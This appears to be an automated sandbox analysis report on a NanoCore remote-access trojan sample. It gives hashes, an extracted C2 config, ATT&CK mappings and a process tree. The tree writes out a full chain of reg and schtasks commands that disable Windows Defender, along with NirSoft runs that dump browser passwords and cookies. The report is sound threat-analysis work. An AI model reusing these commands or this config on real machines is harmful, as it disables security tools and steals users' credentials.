nanocore | 2bad850d4fc1355d5cbdef48a773968dfd53bae047865fe20b131bcf854eb833

Analysis

max time kernel
147s
max time network
152s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
21-10-2022 15:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe
Size

4.7MB
MD5

4efc94d8768163a6e25a53e7d002e962
SHA1

35bbd174ee8a9dc8b269b3bcb2ef42f468af6e43
SHA256

2bad850d4fc1355d5cbdef48a773968dfd53bae047865fe20b131bcf854eb833
SHA512

bafb841aeefc403984cf3236db92ee4a6e4cc0a5b772b7869bf3b604094db39323bb4315cd98a5832ba341023464717ecd9a30e66f62f1dd03ba0031944feb3b
SSDEEP

98304:JAB7bQf3s64R9ybzUcwti78OqJ7TPBF3ZlHHgkWJ0P39qXSaDv:u7CzUcwti7TQlF3ZxxWJSUnDv

Score

10^/10

nanocore evasion keylogger persistence spyware stealer trojan upx

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

6.tcp.ngrok.io:16463

Mutex

5a49404a-bea8-4369-a3bc-4b84d110805c

Attributes

activate_away_mode
true
backup_connection_host
6.tcp.ngrok.io
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2022-06-03T21:54:46.634588736Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
16463
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
5a49404a-bea8-4369-a3bc-4b84d110805c
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
6.tcp.ngrok.io
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

NirSoft WebBrowserPassView 11 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\bruh.exe	WebBrowserPassView
\Users\Admin\AppData\Roaming\bruh.exe	WebBrowserPassView
C:\Users\Admin\AppData\Roaming\bruh.exe	WebBrowserPassView
behavioral1/memory/904-68-0x0000000000B30000-0x0000000000FAE000-memory.dmp	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
behavioral1/memory/1764-90-0x0000000000D10000-0x000000000118A000-memory.dmp	WebBrowserPassView
\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView
\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView

Nirsoft 22 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\bruh.exe	Nirsoft
\Users\Admin\AppData\Roaming\bruh.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\bruh.exe	Nirsoft
behavioral1/memory/904-68-0x0000000000B30000-0x0000000000FAE000-memory.dmp	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
behavioral1/memory/1764-90-0x0000000000D10000-0x000000000118A000-memory.dmp	Nirsoft
\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
behavioral1/memory/1292-152-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
C:\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
behavioral1/memory/1772-153-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
\Users\Admin\AppData\Local\Temp\xwizard.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\xwizard.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\xwizard.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\xwizard.exe	Nirsoft
behavioral1/memory/1772-171-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft

Executes dropped EXE 8 IoCs

Processes:

Windows_Defender.exebruh.exeRtkBtManServ.exesnuvcdsm.exewinhlp32.exesplwow64.exehh.exexwizard.exe

pid process

1776 Windows_Defender.exe
904 bruh.exe
1764 RtkBtManServ.exe
1736 snuvcdsm.exe
1772 winhlp32.exe
1292 splwow64.exe
2000 hh.exe
564 xwizard.exe

pid	process
1776	Windows_Defender.exe
904	bruh.exe
1764	RtkBtManServ.exe
1736	snuvcdsm.exe
1772	winhlp32.exe
1292	splwow64.exe
2000	hh.exe
564	xwizard.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
C:\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
C:\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
behavioral1/memory/1292-152-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/memory/1772-153-0x0000000000400000-0x000000000045B000-memory.dmp	upx

Drops startup file 2 IoCs

Processes:

bruh.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager2771690.exe	bruh.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager2771690.exe	bruh.exe

Loads dropped DLL 13 IoCs

Processes:

2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.execmd.execmd.execmd.exe

pid	process
1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe
1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe
1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe
1536	cmd.exe
1536	cmd.exe
948	cmd.exe
948	cmd.exe
948	cmd.exe
948	cmd.exe
948	cmd.exe
948	cmd.exe
1168	cmd.exe
1168	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Windows_Defender.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\UDP Service = "C:\\Program Files (x86)\\UDP Service\\udpsv.exe"	Windows_Defender.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Windows_Defender.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Windows_Defender.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ipecho.net
16 ipecho.net

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Windows_Defender.exe

flow	ioc
15	ipecho.net
16	ipecho.net

Drops file in Program Files directory 2 IoCs

Processes:

Windows_Defender.exe

description	ioc	process
File created	C:\Program Files (x86)\UDP Service\udpsv.exe	Windows_Defender.exe
File opened for modification	C:\Program Files (x86)\UDP Service\udpsv.exe	Windows_Defender.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

Windows_Defender.exesnuvcdsm.exehh.exexwizard.exe

pid process

1776 Windows_Defender.exe
1776 Windows_Defender.exe
1736 snuvcdsm.exe
2000 hh.exe
564 xwizard.exe
564 xwizard.exe
564 xwizard.exe
564 xwizard.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Windows_Defender.exe

pid process

1776 Windows_Defender.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

Windows_Defender.exeRtkBtManServ.exe

description pid process

Token: SeDebugPrivilege 1776 Windows_Defender.exe
Token: SeDebugPrivilege 1764 RtkBtManServ.exe

pid	process
1776	Windows_Defender.exe
1776	Windows_Defender.exe
1736	snuvcdsm.exe
2000	hh.exe
564	xwizard.exe
564	xwizard.exe
564	xwizard.exe
564	xwizard.exe

pid	process
1776	Windows_Defender.exe

description	pid	process
Token: SeDebugPrivilege	1776	Windows_Defender.exe
Token: SeDebugPrivilege	1764	RtkBtManServ.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exebruh.execmd.exe

description	pid	process	target process
PID 1184 wrote to memory of 1776	1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe	Windows_Defender.exe
PID 1184 wrote to memory of 1776	1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe	Windows_Defender.exe
PID 1184 wrote to memory of 1776	1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe	Windows_Defender.exe
PID 1184 wrote to memory of 1776	1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe	Windows_Defender.exe
PID 1184 wrote to memory of 904	1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe	bruh.exe
PID 1184 wrote to memory of 904	1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe	bruh.exe
PID 1184 wrote to memory of 904	1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe	bruh.exe
PID 1184 wrote to memory of 904	1184	2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe	bruh.exe
PID 904 wrote to memory of 1764	904	bruh.exe	RtkBtManServ.exe
PID 904 wrote to memory of 1764	904	bruh.exe	RtkBtManServ.exe
PID 904 wrote to memory of 1764	904	bruh.exe	RtkBtManServ.exe
PID 904 wrote to memory of 1764	904	bruh.exe	RtkBtManServ.exe
PID 904 wrote to memory of 1292	904	bruh.exe	cmd.exe
PID 904 wrote to memory of 1292	904	bruh.exe	cmd.exe
PID 904 wrote to memory of 1292	904	bruh.exe	cmd.exe
PID 1292 wrote to memory of 860	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 860	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 860	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1484	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1484	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1484	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 268	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 268	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 268	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1352	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1352	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1352	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1968	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1968	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1968	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1964	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1964	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1964	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1744	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1744	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1744	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1656	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1656	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1656	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1988	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1988	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1988	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1996	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1996	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1996	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1216	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1216	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1216	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1716	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1716	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1716	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1528	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1528	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1528	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1732	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1732	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1732	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 524	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 524	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 524	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1616	1292	cmd.exe	schtasks.exe
PID 1292 wrote to memory of 1616	1292	cmd.exe	schtasks.exe
PID 1292 wrote to memory of 1616	1292	cmd.exe	schtasks.exe
PID 1292 wrote to memory of 544	1292	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe
"C:\Users\Admin\AppData\Local\Temp\2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1184

C:\Users\Admin\AppData\Roaming\Windows_Defender.exe
"C:\Users\Admin\AppData\Roaming\Windows_Defender.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Users\Admin\AppData\Roaming\bruh.exe
"C:\Users\Admin\AppData\Roaming\bruh.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:904

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs6RfAXVyyPeX7Il3brCopEiQVIzpHB+LCpwgCsluwLNDj4DBZhLa3hT//vTw/zNKTq/g+c2DxMvUoi/FPCks+UNJgcAoTPofVFGmJidCoJN7mpeBiSYL8sFC+cYcJE4Wzo=
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
PID:864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
- Loads dropped DLL
PID:1536

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1736

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
- Loads dropped DLL
PID:948

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
6⤵
- Executes dropped EXE
PID:1772

C:\Users\Admin\AppData\Local\Temp\splwow64.exe
C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
6⤵
- Executes dropped EXE
PID:1292

C:\Users\Admin\AppData\Local\Temp\hh.exe
C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2000

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
PID:1496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
- Loads dropped DLL
PID:1168

C:\Users\Admin\AppData\Local\Temp\xwizard.exe
C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
4⤵
PID:2008

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:1720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:860

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:1484

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:268

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:1352

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1968

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1964

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1744

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1656

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1988

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:1996

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
4⤵
PID:1216

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:1716

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:1528

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:1732

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:524

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:1616

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:544

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:1580

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:308

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:676

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:1056

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:1604

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1652

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1788

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1648

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:948

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1116

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2020

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:964

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:1948

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Admin_History.txt
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cookies1
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cookies3
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
Filesize
4.4MB

MD5
3405f654559010ca2ae38d786389f0f1

SHA1
8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

SHA256
bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

SHA512
cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
Filesize
4.4MB

MD5
3405f654559010ca2ae38d786389f0f1

SHA1
8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

SHA256
bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

SHA512
cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat
Filesize
156B

MD5
eb51755b637423154d1341c6ee505f50

SHA1
d71d27e283b26e75e58c0d02f91d91a2e914c959

SHA256
db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9

SHA512
e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat
Filesize
74B

MD5
808099bfbd62ec04f0ed44959bbc6160

SHA1
f4b6853d958c2c4416f6e4a5be8a11d86f64c023

SHA256
